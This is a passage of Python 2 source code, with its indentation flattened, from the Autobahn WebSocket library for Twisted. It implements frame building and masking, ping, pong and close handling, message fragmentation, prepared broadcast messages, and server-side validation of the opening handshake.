raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
masker = createXorMasker(mask, l)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
def sendPing(self, payload = None):
"""
Send out Ping to peer. A peer is expected to Pong back the payload a soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
Send a close frame and update protocol state. Note, that this is
an internal method which deliberately allows not send close
frame with invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state in [WebSocketProtocol.STATE_PROXY_CONNECTING, WebSocketProtocol.STATE_CONNECTING]:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe and self.closeHandshakeTimeout > 0:
self.closeHandshakeTimeoutCall = reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
:param reason: An optional close reason (a string that when present, a status code MUST also be present).
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
:param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negoiated which defines semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
self.send_message_frame_masker = createXorMasker(self.send_message_frame_mask, length)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent
that is, there is no endMessageFrame, since you have begun the frame specifying
the frame length, which implicitly defined the frame end. This is different from
messages, which you begin and end, since a message can contain an unlimited number
of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when frame still incomplete, returns outstanding octets, when frame complete, returns <= 0, when < 0, the amount of unconsumed data in payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when =0 : frame was completed exactly
## when >0 : frame is still uncomplete and that much amount is still left to complete the frame
## when <0 : frame was completed and there was this much unconsumed data in payload argument
##
return rest
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
You can send text or binary message, and optionally specifiy a payload fragment size.
When the latter is given, the payload will be split up into frames with
payload <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.trackedTimings:
self.trackedTimings.track("sendMessage")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
## explicit payload_frag_size arguments overrides autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
"""
Ctor for a prepared message.
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be masked (required for client to server WebSocket messages).
:type masked: bool
"""
self._initHixie(payload, binary)
self._initHybi(payload, binary, masked)
def _initHixie(self, payload, binary):
if binary:
# silently filter out .. probably do something else:
# base64?
# dunno
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def _initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
else:
plm = createXorMasker(mask, l).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
class WebSocketFactory:
"""
Mixin for
:class:`autobahn.websocket.WebSocketClientFactory` and
:class:`autobahn.websocket.WebSocketServerFactory`.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of :class:`autobahn.websocket.WebSocketProtocol` using
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`.
By doing so, you can avoid the (small) overhead of framing the
*same* payload into WS messages when that payload is to be sent
out on multiple connections.
Caveats:
1. Only use when you know what you are doing. I.e. calling
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`
on the *same* protocol instance multiples times with the *same*
prepared message might break the spec, since i.e. the frame mask
will be the same!
2. Treat the object returned as opaque. It may change!
Modes: Hybi, Hixie
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be
masked (required for client-to-server WebSocket messages).
:type masked: bool
:returns: obj -- The prepared message.
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSocket servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
`HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!")`.
When you want to accept the connection, return the accepted protocol
from list of WebSocket (sub)protocols provided by client or None to
speak no specific one or when the client list was empty.
You may also return a pair of `(protocol, headers)` to send additional HTTP `headers`.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation *before* your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation *after* your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def processProxyConnect(self):
raise Exception("Autobahn isn't a proxy server")
def parseHixie76Key(self, key):
"""
Parse Hixie76 opening handshake key provided by client.
"""
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
def processHandshake(self):
"""
Process WebSocket opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.externalPort:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.externalPort))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.externalPort == 443) or (not self.factory.isSecure and self.factory.externalPort == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.externalPort, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
if self.http_request_params.has_key('redirect') and len(self.http_request_params['redirect']) > 0:
## To specifiy an URL for redirection, encode the URL, i.e. from JavaScript:
##
## var url = encodeURIComponent("http://autobahn.ws/python");
##
## and append the encoded string as a query parameter 'redirect'
##
## http://localhost:9000?redirect=http%3A%2F%2Fautobahn.ws%2Fpython
## https://localhost:9000?redirect=https%3A%2F%2Ftwitter.com%2F
##
## This will perform an immediate HTTP-303 redirection. If you provide
## an additional parameter 'after' (int >= 0), the redirection happens
## via Meta-Refresh in the rendered HTML status page, i.e.
##
## https://localhost:9000/?redirect=https%3A%2F%2Ftwitter.com%2F&after=3
##
url = self.http_request_params['redirect'][0]
if self.http_request_params.has_key('after') and len(self.http_request_params['after']) > 0:
after = int(self.http_request_params['after'][0])
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page and meta-refresh-redirecting to %s after %d seconds" % (url, after))
self.sendServerStatus(url, after)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : 303-redirecting to %s" % url)
self.sendRedirect(url)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page")
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
if self.debug:
log.msg("received HTTP request body containing key3 for Hixie-76: %s" % key3)
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or a pair (protocol, headers) or raise an HttpException
##
protocol = None
headers = {}
res = self.onConnect(connectionRequest)
if type(res) == tuple:
if len(res) > 0:
protocol = res[0]
if len(res) > 1:
headers = res[1]
else:
protocol = res
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
## optional, user supplied additional HTTP headers
##
## headers from factory
for uh in self.factory.headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## headers from onConnect
for uh in headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
## browser client provide the header, and expect it to be echo'ed
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.externalPort))
if (self.factory.isSecure and self.factory.externalPort != 443) or ((not self.factory.isSecure) and self.factory.externalPort != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.externalPort)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
## cancel any opening HS timer if present
##
if self.openHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("openHandshakeTimeoutCall.cancel")
self.openHandshakeTimeoutCall.cancel()
self.openHandshakeTimeoutCall = None
## init state
##
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
